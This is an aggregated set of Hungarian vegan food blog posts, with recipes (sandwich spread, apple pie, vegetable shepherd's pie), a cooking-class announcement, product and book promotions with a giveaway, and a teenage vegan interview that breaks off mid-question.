Hozzávalók egy normál magyaros vajkrémes műanyag doboz megtöltéséhez - 125 g főtt bab (konzerv tökéletes) - 2 mk ecet - 1 mk pirospaprika - fél mk őrölt kömény - 1/4 mk fokhagyma granulátum - 1 ek olvasztott kókuszolaj - 1 ek víz Botmixerrel habosítsd össze a hozzávalókat, és kész. Ez tényleg ilyen egyszerű! :) Jó étvágyat! Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még. Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :) Nézd meg a legújabb Kertkonyha főzőtanfolyamokat: Kezdő Vegán Vegán MUST HAVE – a kötelező alapcsomag Növényi Tejek és Tejtermékek I Növényi Tejtermékek II A Mindennapi Superfood Kezdő Vegán Angol nyelven The post Magyaros szendvicskrém appeared first on Kertkonyha.
Indul a Zizi Konyhája!
2017. december 16. Zizi kalandjai
Hát ez a nap is eljött, hogy erről írhatok nektek. Lesznek saját mini főzőtanfolyamaim, a saját, új konyhámban!!! Eljöhettek hozzám(nk) és főzhettek együtt velem és más lelkes jelentkezőkkel. Fotó: Kállai Márton (Ez még nem saját konyhámban készült fotó!) Onnan indultam, hogy… 2008 őszén létrehoztam egy blogot… zizikalandjai.blogspot.com néven. Semmi célom nem volt, igazából I. vett rá (mint ahogy rávett a Twitterre és az Instagramra – és milyen jól tette ), hogy csináljak egyet… persze ő találta ki a blog nevét is. Egy posztom árválkodott hónapokig, amit egyedül anyukám nézett meg (már nincs fent a blogon, ne is keressétek ). 2009 nyarán aztán jött Juci barátnőm, aki írt egy utazós blogot és rávett, hogy kezdjek valamit a Zizi kalandjaival. Ráhúztunk egy sablont (ami már nincs meg) és elkezdtem írni mindenféléről, többnyire utazásról és ételről. Július 28-án jelent meg az első receptem, egy vegán lecsós bulgur, noha, akkor még csak vegetáriánus voltam. Berobbant a gasztroblog láz, egyre több magyar és külföldi blogot bújtam és valahogy a cél nélkül elindult Zizi kalandjai elindult egy gasztroblog irányába. Egyre több vegetáriánus, vegán étel receptjét osztottam meg. Vicces látni most a régi bejegyzéseimet, de a fejlődés (fotózás, receptek, írás terén – úgy gondolom megtaláltam a saját “hangomat”, stílusomat – szerintetek is? ) nyomon követhető. 2011 augusztusában egy londoni utazás következett, kiutaztam saját pénzből egy gasztroblogger konferenciára (sajnos nem írtam róla bejegyzést) és megismerkedtem sok–sok külföldi gasztronómiáért rajongó bloggerrel, akik azóta a barátnőim lettek, sikeres szakácskönyv szerzők és utaztunk is egymáshoz. Sokat inspirálódtam, tanultam a konferencián, érdemes volt kiutazni. Aztán barátságot kötöttem itthoni bloggerekkel is, kezdtem megismerkedni a hazai gasztronómiai élettel, és felfedeztem Budapest vega oldalát. 2012-től kitartóan blogoltam, igyekeztem minőségi munkát kiadni a kezemből, megint megújult a blog ruhája. A visszajelzések alapján is átjött az olvasóknak a letisztultság, az átláthatóság. Titokban elkezdtem álmodozni egy saját szakácskönyvről. 2013 tavasza… megszületett első kisfiunk, Ádi, aki a vega gyerek lett. Ebben az évben ősszel kezdtük meg a hozzátáplálást, amelyről néhány bejegyzés is született: első, második, harmadik, negyedik, ötödik. Nem volt nehéz írnom Ádi hozzátáplálásáról, ugyanis nagyon-nagyon jó evő gyerek lett. Már az első falatka répapürét lelkesen ette és azóta is mindig mindent megeszik, amit elé rakunk. Érdekli a főzés, manapság már saját maga szeret alkotni a konyhában. Fejben megalkotja az ételt, én pedig segítek neki elkészíteni. 2014 októberében aztán elindultak a Mit eszik a vegagyerek? sorozatok, amelyekben egyszerűen csak fotókat teszek fel az ételekről, hogy Ádi (és most már Áki is) miket eszik (esznek). Ezzel szeretnék inspirálni mindenkit (főleg anyukákat), hogy viszonylag rövid idő alatt össze lehet dobni változatos, tápanyagokban gazdag, ízletes ebédet vagy vacsorát mindennap a családnak. 2015 őszén több kiadó is megkeresett egy lehetséges szakácskönyv megírása miatt. 2016 év elején megszületett második kisfiunk, Áki. Ezen év elején ültem le először beszélgetni a Boook Kiadóval, akivel nagyon egymásra találtunk. Rövid tervezgetés után megszületett a Vegán Reggeli ötlete, amelyen azonnal elkezdtem dolgozni és az egész nyarat receptek tesztelésével és leírásával töltöttem. Szeptemberben lehullt a lepel és elárultam nektek, hogy hamarosan megjelenik az első vegán Zizi szakácskönyv. 2017 év eleje… még fel sem ocsúdtam a Vegán Reggeli megírásából, már jött az újabb könyv tervezése, receptek tesztelése nagyon rövid idő alatt, éjszakába nyúló laptop püfölés, amikor a recepteket pötyögtem be. Majd tavasszal előrukkoltam a hírrel, hogy hamarosan megjelenik a Mit eszik a vega gyerek? szakácskönyv. Mindkét könyv kedves a szívemnek, a reggelis azért, mert az első, a vega gyerekes azért, mert a gyerekeimhez kötődik. Az évek során nagyon sokan kérdeztétek, hogy mikor tartok főzőtanfolyamokat, ahol tanulni tudtok, ismerkedni a vegán étrenddel, konyhával. Vannak olyanok, akik nemrég írtak nekem, hogy családostul átálltak a vegán étrendre és jól jönne egy kis segítség főzés terén, meg abban, hogy mit, hol lehet beszerezni, mi legyen a kamrában, a hűtőben, hogy egészséges reggelit, ebédet vagy vacsorát tudjanak készíteni a családnak. Mindezekre a kérdésekre választ kaphattok, ha eljöttök hozzám! Többféle órát állítottam össze (majd bővülni fog a lista), így mindenki megtalálhatja a számára legkedvezőbbet: Vegán brunch Kezdő vegánoknak vagy haladó hedonistáknak: késői reggeli és korai ebéd egyben (a brunch szó a breakfast és a lunch, a reggeli és az ebéd kifejezésekből tevődik össze). Könnyed, frissen facsart, préselt zöldség- és gyümölcslevekkel kezdünk, ezt követi egy laktató turmix, amivel kibírjuk addig, amíg a többi finomság elkészül. Lesz vegán rántotta, többféle humusz, saláta, puding és még sütemény is. Nem maradunk éhesek, az biztos! Vegán lettem, mit egyek? Sokan hirtelen váltanak vegán étrendre és elbizonytalanodnak, hogy mit is ehetnek, ami tápláló, finom és jól is laknak tőle. Ez az óra a kezdő vegánoknak, vagy a vegán étrend iránt érdeklődőknek szól, akik egyszerű, olcsó ételek elkészítésével szeretnék megalapozni a tudásukat. Vegán családi ebédek, vacsorák Ez az óra főleg anyukáknak, házitündéreknek, dolgozó nőknek szól, akik szeretnének családbarát recepteket megismerni, amelyek tálalásával jól lakatják a gyerekeket, a családot és a nem vegán rokonságot is. Leves, főétel, saláta és még egy desszert is belefér egy teljes családi menübe! A főzőkurzusokra a lentebbi gombra klikkelve tudtok jelentkezni, de a blogom fejlécében találtok egy Zizi Konyhája menüt, amelyre klikkelve minden információt mindig könnyen megtaláltok (hogyan lehet jelentkezni, hol lesz a kurzus, stb.). Várlak benneteket szeretettel!
Almás pite (laktózmentes, vegán)
2017. december 1. Zizi kalandjai
Olyan népszerű lett a közösségi média felületeken megosztott almás pite fotója és többen követeltétek a fotó hatására a receptet, így gondoltam, hogy megosztom veletek itt a blogon. Annyira, de annyira egyszerű a recept és olyan gyorsan készen van egy kis trükknek köszönhetően, a látvány pedig levesz mindenkit a lábáról. Mentsétek el a receptet, mert karácsonykor szerintem jól fog mutatni egy ilyen desszert az asztalon. A recept gyorsaságának a titka a Tante Fanny édes linzertészta. Ennek köszönhetően készül el nagyon gyorsan! A jó hír, hogy a tészta vegán, így vegánok és laktózérzékenyek is használhatják sütemények készítéséhez. Sajnos a Tante Fannynak nem minden tésztája kapható minden szupermarketben (weboldalon meg tudjátok nézni, hogy ez az édes linzertészta például hol szerezhető be). Érdemes a tésztából kettőt beszerezni, ha szeretnétek szép mintákat is szaggatni a pite tetejére. Attól függően, hogy mekkora formába teszitek, lehet, hogy egy csomag tészta elég lesz a pite aljának és tetejének elkészítésére is, de ha nagyobb formába teszitek, akkor szükség lesz a második csomagra is. A megmaradt tésztából pedig szaggathattok különböző formákat, süssétek meg és kekszként megehetitek, akár úgy is, hogy két kekszet lekvárral ragasztotok össze. Almás pite (laktózmentes, vegán) Mentés Nyomtatás Előkészítési idő 10 perc Főzési idő 20 perc Teljes idő 30 perc Villámgyorsan elkészülő, finom almás pite. Szerző: Zizi Recept típusa: sütemény Konyha: vegán Adag/mennyiség: 4-6 főre Hozzávalók 1 vagy 2 csomag Tante Fanny édes linzertészta 2-3 db alma, kimagozva, vékony szeletekre vágva őrölt fahéj őrölt vanília szeletelt mandula frissen facsart citromlé agavé szirup (opcionális) kókuszolaj Elkészítés A sütőt melegítsük elő 180C fokra. Az almaszeleteket locsoljuk meg egy kevés citromlével, hogy ne barnuljanak meg. Kinyújtjuk a tésztát és beletesszük egy kerek kiolajozott, sütőpapírral bélelt pite formába. A tészta szélét, ha túl nagy és kilóg a formából, akkor vágjuk le. A tésztát villával szurkáljuk meg néhány helyen. Betesszük a sütőbe és 10-15 percen keresztül elősütjük úgy, hogy sütőpapírt teszünk a tésztára és valami nehezéket a sütőpapírra (száraz lencsét vagy babot), hogy a tészta ne emelkedjen fel. Ha félig megsült a tészta, kivesszük a sütőből és az almaszeleteket szépen körbe rátesszük a tésztára, megszórjuk fahéjjal, vaníliával, egy kevés agavésziruppal és szeletelt mandulával. A maradék tésztából (vagy ha nem maradt, akkor egy új csomagot felbontva) csillag formákat szaggatunk rá. Tegyük vissza a sütőbe és légkeveréses programom 180C fokon süssük kb. 20-25 percen keresztül, amíg a teteje is enyhén megbarnul és az almák elkezdenek megpuhulni, kicsit levet ereszteni. Jegyzetek Az agavé szirup el is hagyható, mert a linzertészta be van édesítve, az almák pedig édesek, tehát anélkül is nagyon finom. Az almaszeletek tetejére a szeletelt mandulán kívül aprított diót is tehetünk. 3.5.3229
Vegán életmód – Erdei jógakaland mesekönyv
2017. november 20. Zizi kalandjai
Bánhidi Dórit a blogján keresztül ismertem meg. Először csak virtuálisan, majd egy sajtó eseményen aztán személyesen is találkoztunk már nagy pocakokkal, amikor neki Ármin, nekem meg Ákos növekedett odabent. Folyamatosan követem a szakmai útját, nagyon sok érdekességet oszt meg a méltán népszerű blogján, a Pand Arte-on keresztül. Dóriéknak nemrégiben – családi “vállalkozásban” – jelent meg Erdei jógakaland mesekönyvük, amelyből mi is kaptunk egy példányt. A könyv szuper jól összeköti a mesevilágot, a fantáziát a jógázással. Mozgásra ösztönzi a gyerekeket. Az egyes jóga pózok aztán beépülhetnek a mindennapjainkba. Lelkesen vetettük bele magunkat Ádival a mesébe miközben igyekeztünk minél precízebben megcsinálni az egyes pózokat. Egy 4.5 évessel már egész jól lehet követni a mesét és a jógát is, de a mese megismerése után lehet akár csak a jógára koncetrálni, a mozdulatokat megtanulni és hetente néhányszor elővenni, mint aktív mozgásformát és gyakorolni azt. Dórival beszélgettem a mesekönyvről és ami még mögötte van… Hogyan született meg a Jógakaland ötlete? Mi is ez tulajdonképpen? Kik az alkotók? A Jógakaland az első olyan magyar márka, ami a gyerekjóga köré épült fel. Komplex módon járja közbe ezt a témát, hiszen mesekönyvvel, gyerekjóga workshopokkal és design termékekkel is foglalkozunk, amiknek mind ugyanaz az üzenete: Abszolút családi vállalkozásról van tehát szó, aminek nagyon örülök, mert mindig is szerettem volna a párommal, Schallinger Richárddal közösen alkotni valami maradandót. Ő író és terapeuta, én pedig hat éve foglalkozom a PandArte blogomon magyar tervezőkkel, designnal, szeretek jógázni, és az eddig munkáim miatt elég sok marketinges tapasztalatom van, így össze tettük, amiben jók vagyunk! Két év alatt építettük fel a Jógakalandot. Ő megírta a mesét, kitalálta a karaktereket, a grafikust, Széll Adriennt már ismertem korábban, aki örömmel vállalta, hogy megrajzolja a mesét. Egy gyerekjóga oktatóra volt még szükségünk, aki kitalálja a jógás mozdulatokat, és meg is találtuk, Csíki Mariann személyében. Mariann gyermekjóga oktató, óvónő, és nem utolsó sorban szülő, így neki is nagyon megtetszett az ötlet. Mit kell tudnunk a könyvről? Az “Erdei jógakaland” egy olyan különleges történet, amely elrepíti a gyerekeket Jógaországba, ahol izgalmas kihívások várnak rájuk. Ebben a kalandos világban az érzelmek fejlesztésével és játékos mozgással átélik a jóga örömteli hatásait. Erdei történetünkben a jógázás elemei egy mesekeretre vannak felfűzve, és ahogy a mesében gördülnek egymás után szépen a mondatok, úgy jönnek a gyakorlatok is folyamatosan áramolva. A mese főszereplője újabb és újabb izgalmas kihívásokkal találja szembe magát, amiket úgy tud teljesíteni, ha elvégzi az adott jógagyakorlatot. Így észrevétlenül csempésszük be a gyerekek mindennapjaiba a jógázást, aminek számtalan jótékony hatása van, például segíti az érzelmek megélését és kifejezését, a koncentrációt és a mozgásfejlődést. Nem szükséges hozzá semmilyen előzetes ismeret, úgy alkottuk meg hogy a teljesen kezdő, és a jóga után csak érdeklődő szülő is bátran elmesélhesse gyermekének. Ezt a különleges mesekönyvet nem csak a 3-10 éves korú gyermeknek és azok szüleinek ajánljuk, hanem a jógaoktatóknak, óvónőknek és a kisiskolás pedagógusoknak is. Mindazoknak, akik sokrétűen, mégis könnyedén szeretnék a gyermekeket fejleszteni. Milyen egyéb Jógakaland terméket készítettetek a könyv mellé? A Jógakaland egy mesével indult, de az elmúlt két évben már egy igazi komplex világgá nőtte ki magát. Durmi maci, Hopp nyuszi, Röpcsi bagoly, Hamuka borz, Kukker vakond, valamint Fintor és Cingi kisegerek karakterei már több olyan használati és design tárgyon is megjelennek, amik nem csak szépek, de nagyon praktikusak is. Nekem ez a kedvenc területem, itt alkothattam igazán, és találhattam ki, mivel is szeretném teljessé tenni ezt a márkát. Vannak játékaink, nagyon szeretik például a jógás memóriakártyánkat, vagy a hordozható krétatáblánkat, amire szabadon rajzolhatnak a gyerekek bárhol és bármikor. Szerettem volna olyan termékeket is, amikkel a gyerekszobákat tehetjük hangulatossá! Ide tartoznak például a gyönyörű, kézzel festett fa játéktárolóink, a fali kép szettjeink, a fali lámpáink, a takaróink és a babzsákunk is. És persze vannak olyan jógaklandos dolgok, amik a jógázáshoz köhetőek! Kulacsok, pólók, és jógapárnák, amik nem csak kényelmesek, de segítik például a gyerek egyenes gerinccel üljön. De a lista még így sem teljes, itt megtaláltok mindent. Amire nagyon büszke vagyok, külön is, hogy saját pamut anyaggal dolgozunk, amit jógakalandos grafikával nyomtunk meg! Hol találkozhatunk a Jógakalanddal (események, termékek)? Lesz közös, Jógakalandos jógázás hamarosan! Az egész Jógakaland világot szeretnénk minél szélesebb körben megismertetni a gyerekekkel, ezért kitaláltunk egy különleges, interaktív könyvbemutató turnét! Több budapesti és vidéki helyszínre is várjuk a gyerekeket, ahol közösen jógázhatnak velünk a mesekönyv olvasása közben. Legfrisebb dátumok: november 24-én a Bartók Béla úti Pagonyban, és november 25-én a budaörsi Decathlonban. Minden eseményünkről találtok infot a weboldalunkon. Jógakaland – weboldal – Facebook – Instagram ***** A könyvet ajándékba kaptuk a {Jógakaland} csapatától. A véleményem csakis a sajátom. Figyeljétek a Zizi kalandjai FB oldalát, hamarosan nyereményjáték lesz, amely során egy szerencsés egy Jógakaland szettet nyerhet!
Vegán életmód – Slow Budapest és az anti-határidőnapló + nyereményjáték
2017. november 9. Zizi kalandjai
A 2018-as naplók háromféle borítóval érkeznek… Amikor a Slow Budapesttől megkerestek az anti-határidőnaplóval és elolvastam, hogy miről szól a mozgalom célja, miért hozták létre a naplót, egyből igent mondtam egy közös bejegyzésre és nyereményjátékra. Röviden a lényegük: “Szeretnénk megállítani az embereket egy pillanatra, hogy elgondolkozzanak azon, miért és hova rohannak, és hogy ez megéri-e nekik.” Nálam óriási probléma, hogy lassítsak, hogy foglalkozzak magammal, vagy, hogy inkább leüljek a gyerekkel játszani, a teregetést pedig hagyjam későbbre. Ez az anti-határidőnapló biztosan segíteni fog abban, hogy lassítsak, hogy végiggondoljam egy napomat, egy hetemet, egy hónapomat. Nagyon szép és egyben cuki grafikákat készítettek hozzá… ma este, amikor már nem bírtam a fiúkkal, elővettük, mint újdonságot és a grafikák alapján meséltem nekik, énekeltem vagy mondókákat mondtam, éppen azokat, amik eszembe jutottak a rajzok alapján. A naplóban tanácsokat olvashatunk a lassuláshoz, minden hónapban lejegyezhetjük, hogy mi az, ami számít igazán, kikkel szeretnénk találkozni az adott hónapban, mi a heti mottónk. Ezenkívül a napló bemutatja az adott hónap ünnepeit (akár a farsangtól kezdve, Micimackó napjáig, a Föld napjáig, vagy a nemzetközi palacsinta napig). Minden hónapban bemutat három zöldséget, gyümölcsöt vagy magot, amit érdemes szezonálisan fogyasztani. A hónap lezárásaként pedig leírhatjuk, hogy milyen slow emlékeket viszünk magunkkal és mit kívánunk magunknak a következő időszakra. A naplóhoz tartozik két kis ív matrica is, amelyekkel színesíteni tudjuk a napjainkat! A mai digitális világban számomra jó érzés kézzel papírra írni, meg újra visszatérni a kézzel fogható, finom papír illatú határidőnaplóhoz, amit évek óta már nem használok! A slow mozgalom egyébként Magyarországon újdonság, de világszinten “…1986-ban indult el Olaszországból, a kezdetét egy olasz gasztroblogger, Carlo Petrini tiltakozásához kötik, aki az olasz kultúra egyik legfontosabb jelképénél, a római Spanyol Lépcsőknél egy gyorsétterem megnyitása ellen lépett fel. Ekkor még csupán az étkezés, a slow food volt a mozgalom fókuszában, innen ered az elnevezés is: egy mozgalom, ami a fast (food) ellen lép fel.” A Slow Budapest alapítója, Krajcsó Nelli, a saját, túlhajszolt életére keresett megoldást, amikor találkozott egy, a nemzetközi slow mozgalomról szóló cikkel, ami hangosan üzente felé, hogy Lassíts!. Csapatával a kezdetektől arra keresi a választ, hogyan lehet a fogyasztói társadalomban, az információs túlterheltségben, és egy nagyvárosi környezetben egyensúlyt találni. Nellivel készítettem egy mini interjút az anti-határidőnapló születéséről. Aki pedig részt vesz az interjú után a nyereményjátékban, az növeli az esélyét annak, hogy tulajdonosa legyen egy 2018-as csodaszép anti-határidőnaplónak! Mi az anti-határidőnapló? Az anti-határidőnapló a Slow Budapest Magyarországon egyedülálló naplókoncepciója, ami segíti az embereket a mindennapi egyensúly megtalálásában, ahogy mi mondjuk, a lassításban. A benne lévő vicces rajzok, kedves kérdések, matricák és a számos megállító és továbbmozdító tanács és emlékeztető kreatív ötleteket adnak a mindennapokban, tanítanak, és a slow felé vezető szemléletváltásban segítenek. Az anti-határidőnapló kidolgozásában egészségpszichológiai alapokat, a nemzetközi slow irodalmat és mindfulness technikákat használunk. Az anti-határidőnaplók belseje újrapapírra lett nyomtatva, ásványolajmentes, újratermelődő növényi olaj alapú környezetbarát nyomdafesték és karbonsemleges, zöld technológia felhasználásával. Anti-határidőnaplóink nyomtatásával idén 25 fát mentettünk meg a kivágástól. Honnan, hogyan jött az ötlet, hogy elkészítsétek? 2014-ben azon gondolkoztam a csapatommal, hogy milyen jó lenne egy olyan dolgot létrehozni, amivel mindennap tudjuk az embereket inspirálni a lassításra. Határidőnaplót sokan használnak, jól meg lehet tölteni kedvességgel és játékkal, és mi már akkoriban is nagy hangsúlyt fektettünk az igényes vizuális megjelenésre, sok tehetséges grafikussal dolgoztunk együtt, ezért úgy éreztük, ebben a formában tudnánk a legjobban átadni a slow szemléletet az embereknek. És hogy miért lett anti-határidőnapló? Azért, mert a határidőnaplóba általában a stresszes, határidős dolgokat írjuk csak le, de elfelejtjük a feltöltő, pihenést hozó tevékenységeket vezetni benne. Mi az egyensúly megtartására emlékeztetünk, hogy az élet ne csak a határidőkről szóljon! Kikkel dolgoztatok együtt a napló elkészítésén? Ghyczy Dia és Máté Dani grafikusokkal dolgoztam együtt, akik ezt a komplex és több mint 3 hónapos munkát idén is nagyon jól megoldották. Kiknek ajánljátok a naplót? Bárkinek, aki arra vágyik, hogy teljesebben megélje a mindennapokat, szeret még papírra írogatni, és értékeli a színes vizuális világot. Mi a Slow Budapest mozgalom célja? A Slow Budapest célja a figyelem felhívása a túlhajszoltságra, és egy lassabb, egyensúlyra törekvő életmód népszerűsítése. Hiszünk abban, hogy a lassítás nem luxus, nem a sebességről, hanem a jelenlétről, a tudatosságról és a mindennapi döntésekről szól. Szeretnénk átadni azt a szemléletmódot, hogy a felgyorsult világban is meg lehet teremteni az egyensúlyt. Az anti-határidőnaplóról még többet itt olvashattok. Online megvásárolni pedig itt tudjátok A/5-ös és A/6-os méretekben és viszonteladó partnereknél. “Nagyobb házunk van, de kisebb a családunk. Nagyobb a kényelmünk, de kevesebb az időnk. Több a diplománk, de kevesebbet értünk. Gazdagabb a tudásunk, de szegényebb az ítélőképességünk. Több van szakértőkből, de tbb a problémánk is. Több a gyógyszerünk, de szegény az egészségünk. Elutaztunk a Holdra, és vissza, de nehezünkre esik átmenni az út túloldalára, hogy az új szomszéddal talákozzunk. Számítógépeket építettünk, hogy több információt tárolhassunk, hogy több másolatot készíthessünk, mint eddig bármikor, de kevesebbet beszélgetünk. Mennyiségben nagyok lettünk, de minőségben kicsik. Egy olyan korban élünk, ahol az ételek gyorsak, de az emésztés lassú. Ahol az ember hatalmas, de a karakter kevés. Ahol a profit meredek, de a kapcsolatok sekélyesek. Olyan idők járnak, amikor sok van az ablakban, de kevés a szobában.” (Dr. Bob Moorehead: Korunk Paradoxonja, 1998) ***** NYEREMÉNYJÁTÉK!!! Nyeremény : 1 darab anti-határidőnapló, amit a nyertes választhat ki magának (méret, borító)! Írjátok meg ide a bejegyzés alá kommentben, hogy ti mivel szoktatok lassulni, relaxálni, mit csináltok olyankor, amikor úgy gondoljátok, hogy muszáj megállnotok egy fél órára vagy egy órára! Szabályok : A kommentelésen felül plusz pontokért lájkolhatjátok a Slow Budapest Facebook és Instagram oldalát (írjátok meg ezt is a kommentben, ha megtettétek). 2017. november 14-ig lehet játszani. Sorsolás a random.org-gal. Eredményhirdetés 2017. november 15-én. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek a Slow Budapest postázza magyarországi címre.
Vegán Gyros, most már az otthonodban is, könnyedén
2017. október 27. Vegán lettem
Új termékkel rukkolt elő a Vegan Grill. A nem egészen egy hónapja piacra dobott Vegán Gyros segítségével otthonodban is átélheted kedvenc gyroszos élményeidet. 2016 szeptemberében jelent meg a Vegan Grill márka a magyar húshelyettesítők piacán és klasszikus ízeinek köszönhetően gyorsan sokak kedvencévé vált. A kezdésnek piacravezetett öt termék - a csípős és magyaros grill kolbász, valamint a csípős, magyaros és provance-i hagymás szejtán - után pár havonta dobták piacra újabb és újabb finomságaikat. Először Natúr Szejtánnal, majd bükkfán füstölt Száraz Bászkával és Grill Bászkával, végül a Vegán Gyrosszal bővítették repertoárjukat. Vegán Gyros A pikáns gyroszos fűszerezés és a vékonyra vágott szejtáncsíkok adják a Vegan Grill Vegán Gyroszának ízélményét. Érzésre olyan, mintha a kedvenc gyrosodnál lennél, csak nem kell elsétálnod már a sarokig sem, hisz otthon is elkészítheted a Vegán Manufaktúra klasszikus gyroszát. De nem csak a termékkel újítottak, hanem a csomagolás is változott. Az eddigi termékek vákuumcsomagolt rendszerrel készültek, de a Vegán Gyros már egy exkluzívabb megjelenésű papírdobozba került a vákuumcsomagoláson kívül. Nálunk nagy kedvencek az eddigi Vegan Grill termékek, így nem volt kérdés, hogy leteszteljük a Vegán Gyrost is. Rögtön két csomaggal vásároltunk és többféle ételt készítve teszteltük őket. Kevés olajon megpirítottuk a csomagok tartalmát és készítettünk belőle hambit, sima szendvicset, kipróbáltuk fűszeres rizzsel és gombás mártással is. Ahogy a Vegan Grill hagymás szejtánjait, úgy a Vegán Gyrost is lényegében úgy használod fel ahogy akarod. Bármit készítettünk belőle, mindenhez passzolt. Egyébként a Vegan Grill facebook oldalán van egy kifejezetten receptes fül, ahova heti két recept kerül fel. Amióta a Vegán Gyrost piacra dobták, csak a gyrosból feltöltöttek négyet. Szóval egy szó mint száz, a lehetőségek tárháza határtalan, illetve a kreativitásunk húzza meg a határokat. Budapesten aránylag már sok helyen hozzájuthatsz, de vidéken is fellelhetőek a Vegan Gyros és Vegan Grill termékek többek között Debrecen, Győr, Körmend, Miskolc, Szentendre és Veszprém városaiban. A vegangrill.hu oldalon elvileg a boltok is be vannak listázva, bár szerintem ennél sokkal több helyen kaphatóak már a termékeik. A nagyobb vidéki városokban biztos körbenéznék a bio boltokban és ha nem találom kérném, hogy rendeljenek, hiszen az összes nagyobb nagykereskedésben bent van már a Vegan Grill. A Vegan Grill weboldala, ahol infókat találsz a Vegán Gyrosról. A Vegan Grill facebook oldala, ahol Vegán Gyros recepteket találsz.
Zöldséges pásztor pite
Sheperds pie - így hívják az angolok, és igen, ez egy tipikus angol étel (ami, ha jól tudom, végre angol és nem más országból átvett étel). Megtalálható minden étterem kínálatában, munkahelyi konyhákon, kantinokban is gyakori étel. Nem, nem alulra teszik a krumplipürét egyátalán! Mondhatnám, az igazi pásztor pite alja nem krumpli. Míg mi magyarok inkább a krumplira tennénk a szószt, majd befednénk krumplival, itt viszont épp az a lényeg, hogy nem tesznek alá krumplit (így könnyebb lesz mosogatni is az edényt). Az eredeti ételt bárányhúsból készítik krumplival, viszont marhahúsból is szokták, de azt inkább Cottage pie-nak hívják. Cottage-okban laktak a szegényebb emberek, akik bárány helyett inkább marhahússal elkészítve engedhették meg maguknak. Ha pedig krumplipüré helyett leveles tésztával készítenénk akkor skót mintára készül a pásztor pite. Mindenesetre az angolok remekül megtalálták a módját, hogyan használják fel a maradék krumplipürét, ami esetleg előző nap megmaradt az ebédből. A recept Hozzávalók: - 1 kg krumpli - 1 kg vegyes zöldségkeverék (brokkoli, karfiol, répa vagy kedvünkre való más zöldségek) - 2 ek vegán margarin - 4 dl meleg növényi tej - 1 ek kókuszzsír - 1,5 ek étkezési keményítő - só - ételízesítő - fokhagyma (opcionális) - kurkuma (opcionális) - sörélesztőpehely (opcionális) Elkészítés: A krumplit megpucoljuk, felkarikázzuk és annyi vízben, ami épp ellepi, só hozzáadásával feltesszük főzni. Amíg fő, a zöldségeket kevés sóval az edény alján kevés vízzel megpároljuk. Majd egy edényben a kókuszzsírt 2 dl növényi tejjel összemelegítjük. 1 dl hideg növényi tejjel csomómentesre keverjük a keményítőt és hozzákeverjük ahhoz a növényi tejhez, amivel a kókuszzsírt összemelegítettük. Kis lángon addig keverjük, amíg be nem sűrűsödik. Ételízesítőt szórunk bele. Ha sárgább színt szeretnénk, egy kis kurkumát is tehetünk bele, ha esetleg az ételízesítő nem színezné be eléggé. Ha fűszeresebb ízt szeretnénk, nyomhatunk bele 2-3 gerezd megpucolt fokhagymát vagy szórhatunk bele fokhagyma-granulátumot. Enyhén sajtos ízvilágot érhetünk el némi sörélesztő pehely hozzáadásával. A megpárolt zöldésget összekeverjük ezzel a besamel szósszal. A megfőtt krumpliról a levet leszűrjük, hozzáadjuk a margarint és 1 dl növényi tejet. Krumplinyomóval vagy villával összetörjük a krumplit, szükség esetén sózzuk. Így elkészítjük a krumplipürét. (Ha túl sok krumplipüré maradt tegnapról, használjuk fel azt, viszont mellőzzük az instant porból készített gyors krumplipürét, az ugyanis túl folyós lesz a szósz tetejére.) A krumplipürének nem szabad túl folyósnak lennie. Fogunk egy tűzállló edényt (pl. jénai tálat) vagy egy tepsit. Kókuszzsírral kikenjük az alját és oldalát. Beleöntjük a zöldséges szószt, majd pedig a tetejére halmozzuk és simítjuk a krumplipürét. A tetejét villával megszurkáljuk. Sütőben enyhén aranybarnára sütjük. Tálalásnál a zöldésges szósz enyhén folyós állagú lesz, de épp ez az egyik tulajdonsága. Amolyan szószos, nem áll egybe, mint pl. egy rakott krumpli.
A magyar háztartások egyre többet költenek zöldségre és gyümölcsre
A felmérés szerint 2016-ban több mint 10 milliárddal többért vásároltunk, mint az előző évben.
Z generációs vegánok – interjúsorozat, 1. rész: Barabási Liza
2017. október 20. Zizi kalandjai
A social medianak hála egyre több olyan tizen-huszonéves fiatallal találkozom, akik tudatosak, figyelnek a környezetvédelemre és vegánok lettek. Ők nem egy trendre ülnek fel, hanem tényleg komolyan gondolják ezt az egészet. Ilyen fiatalon megváltoztatják az életüket, a social median keresztül megosztják tapasztalataikat, bátorítják a hasonló korú fiatalokat, akik érzik, hogy változtatni szeretnének, de nem tudják, hogy induljanak el. Mi a titkuk? Hogyan lesznek olyan lenyűgözően természetesek? Ezt szeretném nektek bemutatni ezzel a sorzattal. Fogadjátok szeretettel első interjú alanyomat, Barabási Lizát! Bemutatnád magad röviden? Sziasztok, Barabási Liza vagyok, 16 éves, tizedik osztályos. Kb. másfél éve döntöttem úgy, hogy egy tudatosabb életet szeretnék élni, és egészségesebb lenni testileg-lelkileg. Életem legjobb döntése volt, hogy vegán lettem! Hogyan fogadta a környezeted (szülők, nagyszülők, barátok, osztálytársak), amikor bejelentetted, hogy vegán leszel/lettél? Én viszonylag keveset tájékozódtam, mielőtt beszéltem erről a szüleimmel, szóval mindenképp azt ajánlanám, hogy annyira tájékozódjon mindenki, amennyire csak tud (az interjú végén megosztok pár dokumentumfilmet, könyvet, amiket nagyon jónak tartok)! A szüleim, nagyszüleim nem értenek egyet az étkezésemmel, de úgy gondolom, hogy elfogadják, hogy így döntöttem, segítenek amennyire csak tudnak! A barátaim a lehető legjobban fogadták, hiszen saját döntéseikből négyen váltottak vegetáriánus, vagy vegán étkezésre. Persze néha jön pár poén a vegánsággal kapcsolatban, de már megtanultam őket kezelni! Mi volt a motivációd a váltásra? A motivációm egy egészségesebb és tudatosabb élet, a tudat, hogy nem ártok sem az állatoknak, sem a Földünknek azzal, ahogy étkezem, illetve lelki és testi egészség, és egy új korszak kezdete. A váltás egyik napról a másikra történt vagy szakaszokban (pl. először vegetáriánus lettél és utána vegán)? A váltás nálam úgy nézett ki, hogy amikor kijelentettem, hogy vegán szeretnék lenni, anyukámmal abban tudtunk megállapodni, hogy válasszak ki egy fajta állati terméket, amit fogok még enni. Így hetente egyszer-kétszer fogyasztottam valami joghurtot, de ezen kívül semmilyen húst, tejterméket vagy tojást nem ettem. Ez kb így ment még három hónapig, utána azt is elhagytam. A vegán étrend egyfajta tudatosságot is hoz az embernek. Te mire figyelsz oda az egészségedet illetően a vegán étrend miatt 